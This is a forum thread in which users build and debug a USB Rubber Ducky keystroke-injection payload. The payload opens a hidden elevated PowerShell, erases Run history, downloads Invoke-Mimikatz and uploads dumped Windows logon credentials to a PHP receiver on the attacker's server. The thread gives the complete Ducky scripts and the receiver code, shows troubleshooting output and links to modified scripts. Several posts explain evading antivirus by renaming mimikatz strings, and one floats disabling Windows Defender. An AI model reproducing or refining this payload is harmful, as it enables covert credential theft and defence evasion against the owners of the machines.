mavieprivee Posted February 12, 2017 Posted February 12, 2017 Hello everyone. For a few days I try to run my first PAYLOAD, following the purchase of the USB Rubber Ducky ... but it doesn't work ;-( In my inject.bin file, I have this: DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)"&exit ENTER NB : I can give the exact url of my hosting by private message I transferred by filezilla on my server both files: im.ps1 (download here : https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 <-- I haven't change) and rx.php In rx.php I have this code : <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> When I insert the USB key, the script executes apparently without error... But no file is created on my hosting ;-( I reread the whole script ... but I do not understand why it doesn't work ;-( Can you help me ? Thank's all ;-) NB : I'm living in FRANCE/Paris and in Normandy (Cabourg). If you go through there, I can offer you a drink ;-) Quote
mavieprivee Posted February 12, 2017 Posted February 12, 2017 In addition to my previous message: I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds With no data ;-( Quote
shr00mie Posted February 13, 2017 Posted February 13, 2017 5 hours ago, mavieprivee said: In addition to my previous message: I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds With no data ;-( 1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz. IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o) Quote
L07TB0Y Posted February 13, 2017 Posted February 13, 2017 On 1/14/2017 at 3:08 PM, henna3 said: I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround? Amazing twin duck payload! Thanks. did you find a solution? i am running into the same thing and well even if i choose to run the UAC i am not getting a file so Quote
L07TB0Y Posted February 13, 2017 Posted February 13, 2017 well looks like win10 is now blocking scripts it could vie becuse i am running win 10 enterprise PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou t-File '%duck%\%computername%_creds.txt';" .\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module ... + ~~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess Quote
mavieprivee Posted February 13, 2017 Posted February 13, 2017 6 hours ago, shr00mie said: 1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz. IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o) Hello shr00mie, When I run just the line IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o) in a .ps1 file, I obtain a file on my server with this : .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 .## ^ ##. "A La Vie, A L'Amour" ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 20 modules * * */ ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106 mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) mimikatz(powershell) # exit Bye! ;-( Quote
Sh4d0wm4n Posted February 14, 2017 Posted February 14, 2017 On 13/2/2017 at 3:58 AM, shr00mie said: 1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz. IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o) His script is not out of order, it is in fact exactly the new version introduced in this very useful post from the OP. The history cleaning is performed only when the powershell process shuts down/exits. ;) On 13/2/2017 at 6:49 AM, L07TB0Y said: well looks like win10 is now blocking scripts it could vie becuse i am running win 10 enterprise PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou t-File '%duck%\%computername%_creds.txt';" .\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module ... + ~~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess For your info, many AV, included Windows Defender, are now able to detect the invoke-mimikatz.ps1 script. But never trust your AV too much, as there is always an easy workaround ;)Check this post for detailed instructions:http://www.blackhillsinfosec.com/?p=5555 Basically you just need to modify the original invoke-mimikatz.ps1 script, substituting every "mimikatz" word with another one (mimidogz?). I've also found an alternate and lighter version (400K vs 2.5Mb) of the original invoke-mimikatz script, that is not detected as well: but with this one you need to type the commands interactively: no --DumpCreds switch. Here:https://gist.github.com/subTee/0a3b56ac743e8d1eeab0 I've already tested both and they work like a charme, until a future 'cheap' AV update... ;) Quote
Sh4d0wm4n Posted February 14, 2017 Posted February 14, 2017 I forgot to mention also that the minimum columns number for a powershell window is now 20. No more 18, or it will not shrink. P.S.Is there a way to edit a post after posting it?! I cannot find it. Quote
Sh4d0wm4n Posted February 18, 2017 Posted February 18, 2017 Hello everybody, you can get my modified invoke-mimikatz.ps1 (renamed md.ps1) from this link: https://goo.gl/FoLS0P While this is the Duck script: DELAY 1000 GUI r DELAY 300 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 500 REM ALT y LEFTARROW DELAY 300 ENTER DELAY 300 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://your.domain/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('https://your.domain/rx.php', $o)"&exit ENTER And this is the rx.php file content, you need to put on your server to receive the credentials: <?php date_default_timezone_set('Europe/Rome'); $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".txt"; file_put_contents($file, file_get_contents("php://input")); ?> Quote
Epoc Posted March 16, 2017 Posted March 16, 2017 Hello Sh4d0wm4n, Your script is great, thank you ! But, unfortunately, the link with your modified invoke-mimikatz.ps1 (renamed md.ps1), isn't available anymore... Could you, please, reupload it again ? Thanks a lot ! Quote
shr00mie Posted March 17, 2017 Posted March 17, 2017 This what you're looking for. https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz Quote
MS08067 Posted April 4, 2017 Posted April 4, 2017 I am getting the following error. The web server does create the file, however the contents are blank, here is what is found when running the command.. anyone else run into this? C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)" New-Object : Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:85 + ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ... + ~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException C:\WINDOWS\system32> Quote
MS08067 Posted April 4, 2017 Posted April 4, 2017 1 hour ago, MS08067 said: I am getting the following error. The web server does create the file, however the contents are blank, here is what is found when running the command.. anyone else run into this? C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)" New-Object : Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:85 + ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ... + ~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException C:\WINDOWS\system32> I figured out whats going on here. Windows Defender was catching it and removing it before It was able to be ran. Once I disabled it, it then worked just fine. Now the question is, should we automate turning windows defender off as a service (since we are administrator) or do we try and obfuscate the file so its not detected ? Quote
joe4729 Posted October 31, 2022 Posted October 31, 2022 Is this the payload where she plugs it in to screen off xomputer and waits few seconds and pulls it out and then has the login and password ?? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.